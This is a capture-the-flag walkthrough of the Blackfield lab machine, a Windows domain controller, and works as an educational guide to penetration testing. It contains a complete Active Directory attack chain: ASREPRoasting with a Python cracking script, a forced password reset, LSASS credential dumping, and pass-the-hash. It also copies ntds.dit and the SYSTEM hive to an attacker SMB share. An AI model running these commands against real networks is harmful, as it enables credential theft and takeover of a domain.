# Blackfield

<figure><img src="/files/8iHEjY2YcEyi2gExs1ab" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the whole port range quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the `allPorts` file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Wed Apr  5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.099s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
49676/tcp open  unknown

# Nmap done at Wed Apr  5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the `targeted` file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Wed Apr  5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.067s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   filtered netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49676/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-04-05T15:36:56
|_  start_date: N/A
|_clock-skew: 8h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 seconds
```

{% endcode %}

Port 53 is open, so let's ask the DNS server for every record it will return for `blackfield.local` with *dig* (`any` requests all record types for the name; it is not a subdomain brute force). A zone transfer (`dig axfr blackfield.local @10.10.10.192`) is also worth a try, although AD DNS refuses it to unauthorised hosts by default.

> dig any blackfield.local @10.10.10.192

{% code overflow="wrap" %}

```
; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local.              IN      ANY

;; ANSWER SECTION:
blackfield.local.       600     IN      A       10.10.10.192
blackfield.local.       3600    IN      NS      dc01.blackfield.local.
blackfield.local.       3600    IN      SOA     dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600
blackfield.local.       600     IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; ADDITIONAL SECTION:
dc01.blackfield.local.  3600    IN      A       10.10.10.192
dc01.blackfield.local.  3600    IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; Query time: 36 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Wed Apr 05 11:36:42 CEST 2023
;; MSG SIZE  rcvd: 199
```

{% endcode %}

Let's add the hostnames to the `/etc/hosts` file. Note that `hostmaster.blackfield.local` in the SOA record is the responsible-party mailbox (hostmaster@blackfield.local), not a host, so only the domain name and the DC name need an entry.

> nano /etc/hosts

{% code overflow="wrap" %}

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.192    blackfield.local dc01.blackfield.local
```

{% endcode %}

Let's keep enumerating the domain controller. We can check whether the SMB server hosts any interesting share by listing them as `guest` with an empty password.

> smbmap -H 10.10.10.192 -u 'guest'

{% code overflow="wrap" %}

```
[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        NO ACCESS       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        NO ACCESS       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          NO ACCESS       Logon server share
```

{% endcode %}

If we list the `profiles$` share, we'll see a long list of directories named after what look like user accounts.

> smbmap -H 10.10.10.192 -u 'guest' -r profiles$

{% code overflow="wrap" %}

```
[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        profiles$                                       READ ONLY
        .\profiles$\*
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    .
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ..
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    AAlleni
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABarteski
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABekesz
...
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZScozzari
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZTimofeeff
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZWausik
```

{% endcode %}

## Exploitation

Let's put those usernames in the `users` file, dropping the `.` and `..` entries from the listing.

> smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' | grep -v '^\.' > users

As the domain controller has the *Kerberos* service exposed, we can verify if any of these users is valid using *kerbrute*.

> kerbrute\_linux\_amd64 userenum --dc 10.10.10.192 -d blackfield.local users

```
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop

2023/04/05 12:38:10 >  Using KDC(s):
2023/04/05 12:38:10 >   10.10.10.192:88

2023/04/05 12:38:31 >  [+] VALID USERNAME:       audit2020@blackfield.local
2023/04/05 12:40:23 >  [+] VALID USERNAME:       support@blackfield.local
2023/04/05 12:40:28 >  [+] VALID USERNAME:       svc_backup@blackfield.local
2023/04/05 12:40:53 >  Done! Tested 314 usernames (3 valid) in 162.879 seconds
```

Now that we have a list of valid users, put them into the `valid_users` file and try an *ASREPRoast* attack against them.

{% hint style="info" %}
**ASREPRoast** attack: when an account has Kerberos *pre-authentication* disabled (`DONT_REQ_PREAUTH`), anyone can send an AS-REQ for it and the KDC answers with an AS-REP whose encrypted part is protected by a key derived from the user's password (for RC4-HMAC, the NT hash). That encrypted blob can be taken offline and cracked by trying candidate passwords until the checksum verifies.
{% endhint %}

> impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid\_users

* `-no-pass` don't ask for **password**.
* `-usersfile` file which contains **user** per line.

{% code overflow="wrap" %}

```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3
[-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
```

{% endcode %}

We get an AS-REP hash for the `support` user. Let's try to crack it with *john* (save the `$krb5asrep$...` line to a file called `hash`).

> john -w=/usr/share/wordlists/rockyou.txt hash

{% code overflow="wrap" %}

```
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL)     
1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

{% endcode %}
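To make the cracking step concrete, here is an added example (not code from this write-up) that reimplements what john does for each candidate against an etype 23 AS-REP hash: derive the NT hash from the candidate, decrypt the enc-part per RFC 4757 with key usage 8, and check the HMAC-MD5 checksum. The hash line it cracks is constructed locally with `build_asrep()` under a known password rather than taken from the output above; `check_password()` accepts a real `$krb5asrep$23$` line from GetNPUsers as well.

```python
#!/usr/bin/env python3
"""Offline check of candidate passwords against an etype 23 (RC4-HMAC) AS-REP hash.

Added example, not code from the original write-up. Per candidate it does what
john/hashcat do: NT hash -> RFC 4757 key usage 8 -> RC4 decrypt -> HMAC-MD5 compare.
MD4 is implemented locally because OpenSSL 3 builds of hashlib usually disable it.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_AS_REP = 8  # enc-part of KRB_AS_REP (RFC 4120, section 7.5.1)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; returns the 16-byte digest."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """etype 23 long-term key: MD4 of the UTF-16LE encoded password."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def parse_asrep(hash_line: str):
    """Split a '$krb5asrep$23$user@REALM:checksum$edata' line (GetNPUsers output)."""
    prefix = "$krb5asrep$23$"
    if not hash_line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled")
    ident, rest = hash_line[len(prefix):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return ident, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_password(hash_line: str, candidate: str) -> bool:
    """True if the candidate's key decrypts the enc-part to a matching checksum."""
    _, checksum, edata = parse_asrep(hash_line)
    k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", KEY_USAGE_AS_REP))
    k3 = _hmac_md5(k1, checksum)
    plaintext = rc4(k3, edata)  # 8-byte confounder || DER-encoded EncASRepPart
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def build_asrep(user, realm, password, enc_part, confounder=b"\x00" * 8):
    """KDC side of RFC 4757 encryption; used here only to construct a test line."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_AS_REP))
    plaintext = confounder + enc_part
    checksum = _hmac_md5(k1, plaintext)
    edata = rc4(_hmac_md5(k1, checksum), plaintext)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


def crack(hash_line, wordlist):
    """Return the first candidate that validates, or None."""
    return next((w for w in wordlist if check_password(hash_line, w)), None)


if __name__ == "__main__":
    # Constructed line: a fake EncASRepPart encrypted under a known password.
    line = build_asrep("support", "BLACKFIELD.LOCAL", "#00^BlackKnight", b"fake-EncASRepPart")
    print(crack(line, ["Password1", "#1ByNature", "#00^BlackKnight"]))
```

The check is cheap (one MD4, three HMAC-MD5 and one RC4 pass per candidate), which is why RC4-HMAC AS-REPs crack so much faster than the AES etypes 17/18, where the key derivation goes through 4096 PBKDF2 iterations.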

Let's use the credentials we have to enumerate the domain in depth with *bloodhound-python*.

> bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local

* `-c All` run every **collection** method (group memberships, ACLs, sessions, etc.).
* `-ns` use the domain controller as **DNS** server to resolve the domain.

{% code overflow="wrap" %}

```
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 10S
```

{% endcode %}

The `KRB_AP_ERR_SKEW` warning at the end is the 8-hour clock skew nmap reported earlier: Kerberos rejects requests when the clocks differ by more than 5 minutes, so bloodhound-python fell back to NTLM and the collection still completed. If we need Kerberos later (for example to use a ticket), we have to sync our clock with the DC first, e.g. `ntpdate 10.10.10.192`.

Now we can start *BloodHound*. First, start *neo4j*.

> neo4j console

Then open `http://localhost:7474` in a browser and log in with the username *neo4j* and password *neo4j*; you'll be asked to change the password on first login.

On a new console, run BloodHound.

> bloodhound --no-sandbox

Then log in with the credentials you set up earlier.

![](/files/TWcXCH3vGcq32lGTW9iR)

Then, click on the *Upload Data* button on the right section and select all the `.json` files generated with *bloodhound-python*.

![](/files/Tt1fT4gsaMJKCi2iy3pc)

Once all the `.json` files are uploaded, search for the user `support@blackfield.local`. In the `First Degree Object Control` section we'll see a `ForceChangePassword` edge to `audit2020`: the `support` user can reset that user's password without knowing the current one.

<figure><img src="/files/9ZxCE8kbf5omMpRbG9G8" alt=""><figcaption></figcaption></figure>

We can reset the password of `audit2020` as `support` using *rpcclient* (`-N` skips the password prompt, `-U user%pass` supplies the credentials, and `setuserinfo2 ... 23` sets a new password over SAMR). This is a destructive change: the legitimate user will no longer be able to log in with the old password, so on a real engagement agree on it and record it beforehand.

> rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$"

Verify that the credentials are valid.

> crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

```
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:alfa8sa123$
```

Now that we have valid credentials for the `audit2020` user, let's see if we have access to any other share.

> smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

{% code overflow="wrap" %}

```
[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        READ ONLY       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        READ ONLY       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          READ ONLY       Logon server share
```

{% endcode %}

There is one more share we can now read. Let's mount the `forensic` share locally (create the mount point first with `mkdir -p /mnt/forensic`).

> mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123$,domain=BLACKFIELD.local,rw"

Inside there is a directory called `memory_analysis`.

> ls -l /mnt/forensic/

```
total 0
drwxr-xr-x 2 root root 0 Feb 23  2020 commands_output
drwxr-xr-x 2 root root 0 May 28  2020 memory_analysis
drwxr-xr-x 2 root root 0 Feb 23  2020 tools
```

This directory contains one ZIP file per process. One of them is `lsass.zip`; if it holds a memory dump of `lsass.exe`, we can extract credentials from it, since LSASS keeps the NT hashes (and sometimes cleartext passwords) of logged-on users in memory.

> ls -l /mnt/forensic/memory\_analysis/

```
total 506000
-rwxr-xr-x 1 root root  37876530 May 28  2020 conhost.zip
-rwxr-xr-x 1 root root  24962333 May 28  2020 ctfmon.zip
-rwxr-xr-x 1 root root  23993305 May 28  2020 dfsrs.zip
-rwxr-xr-x 1 root root  18366396 May 28  2020 dllhost.zip
-rwxr-xr-x 1 root root   8810157 May 28  2020 ismserv.zip
-rwxr-xr-x 1 root root  41936098 May 28  2020 lsass.zip
-rwxr-xr-x 1 root root  64288607 May 28  2020 mmc.zip
-rwxr-xr-x 1 root root  13332174 May 28  2020 RuntimeBroker.zip
-rwxr-xr-x 1 root root 131983313 May 28  2020 ServerManager.zip
-rwxr-xr-x 1 root root  33141744 May 28  2020 sihost.zip
-rwxr-xr-x 1 root root  33756344 May 28  2020 smartscreen.zip
-rwxr-xr-x 1 root root  14408833 May 28  2020 svchost.zip
-rwxr-xr-x 1 root root  34631412 May 28  2020 taskhostw.zip
-rwxr-xr-x 1 root root  14255089 May 28  2020 winlogon.zip
-rwxr-xr-x 1 root root   4067425 May 28  2020 wlms.zip
-rwxr-xr-x 1 root root  18303252 May 28  2020 WmiPrvSE.zip
```

Transfer it to our current directory, and decompress it.

> cp /mnt/forensic/memory\_analysis/lsass.zip .
>
> unzip lsass.zip

Now we have the `lsass.DMP` minidump. *Mimikatz* can parse it (`sekurlsa::minidump`), but only on Windows; from our Linux box we can use *pypykatz*, which implements the same LSA parsing in Python.

> pypykatz lsa minidump lsass.DMP

```
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
...
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)

...
```

Among other material, we get the NT hash of `svc_backup`. WinRM accepts NTLM authentication, so we can pass the hash directly with *evil-winrm*; if the account is in *Remote Management Users* we get a shell and can grab the user flag.

> evil-winrm -i 10.10.10.192 -u 'svc\_backup' -H 9658d1d1dcd9250115e2205d9f48400d

{% code overflow="wrap" %}

```
Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt
3920bb317a0bef51027e2852be64b543
```

{% endcode %}

## Privilege Escalation

Indeed, the `svc_backup` user is a member of *Remote Management Users*, but it is also a member of the *Backup Operators* group.

{% hint style="info" %}
The **Backup Operators** group grants its members the *SeBackupPrivilege* and *SeRestorePrivilege*. SeBackupPrivilege lets a process open any file or directory for reading with backup semantics, bypassing the NTFS ACL, as long as the tool asks for it (`robocopy /b`, `reg save`, the Win32 backup APIs). It does not bypass file locks: `C:\Windows\NTDS\ntds.dit` is held open by the running directory service, so we first need a Volume Shadow Copy and read the file from the snapshot.
{% endhint %}

> net user svc\_backup

```
User name                    svc_backup
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2020 10:54:48 AM
Password expires             Never
Password changeable          2/24/2020 10:54:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/5/2023 9:00:19 AM

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
```

The idea is to copy the `ntds.dit` file to our system, so we can extract the NTLM hashes of all the domain users offline. We can follow the article [Dumping Domain Password Hashes](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/). First, set up a simple SMB server serving the current directory.

> impacket-smbserver smbFolder $(pwd) -smb2support

Now, go to `\windows\temp`, create the directory `privEsc` and move into it.

> cd \windows\temp
>
> mkdir privEsc
>
> cd privEsc

Then, create a new file called `diskshadow.txt` and upload it to the victim machine. Make sure to add a blank space at the end of each line.

> nano diskshadow\.txt
>
> upload /home/alfa8sa/HTB/machines/blackfield/diskshadow\.txt

```
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% z: 
```

Run *diskshadow* with the script to create a persistent shadow copy of `C:` and expose it as the `Z:` drive. `nowriters` skips the VSS writers, so the snapshot does not need cooperation from the services (including the directory service) that hold files open.

> diskshadow\.exe /s diskshadow\.txt

```
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  4/5/2023 12:35:51 PM

-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable.

Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}

        * Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018}               %someAlias%
                - Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 4/5/2023 12:35:52 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018}
The shadow copy was successfully exposed as z:\.
->
```

Now, we should see the `ntds.dit` in the `z:` disk.

> dir z:\windows\ntds

```
    Directory: z:\windows\ntds


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2023   2:34 PM           8192 edb.chk
-a----         4/5/2023  12:35 PM       10485760 edb.log
-a----        2/23/2020   9:41 AM       10485760 edb00004.log
-a----        2/23/2020   9:41 AM       10485760 edb00005.log
-a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
-a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
-a----        2/23/2020   9:41 AM       10485760 edbtmp.log
-a----         4/5/2023  12:30 PM       18874368 ntds.dit
-a----         4/5/2023  12:30 PM          16384 ntds.jfm
-a----         4/5/2023  12:30 PM         434176 temp.edb
```

Let's copy it to our SMB server with *robocopy* in backup mode (`/b`), which uses SeBackupPrivilege to read the file regardless of its ACL.

> robocopy /b z:\windows\ntds \\10.10.14.5\smbFolder\ ntds.dit

We also need the `SYSTEM` hive, since it holds the boot key that protects the password encryption key (PEK) inside `ntds.dit`. Backup Operators can export it with *reg save*.

> reg save HKLM\system \\10.10.14.5\smbFolder\system

Finally, extract the NTLM hashes offline with *secretsdump*; `LOCAL` tells it to parse the two files instead of connecting to a host, using the boot key from the `SYSTEM` hive to decrypt the PEK and then the hashes.

> impacket-secretsdump -system system -ntds ntds.dit LOCAL

{% code overflow="wrap" %}

```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
```

{% endcode %}

As we have the NTLM hash of the *administrator* user, we can get a shell. Then, all we have to do is reap the harvest and take the root flag.

> evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee

{% code overflow="wrap" %}

```
Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
4375a629c7c67c8e29db269060c955cb
```

{% endcode %}


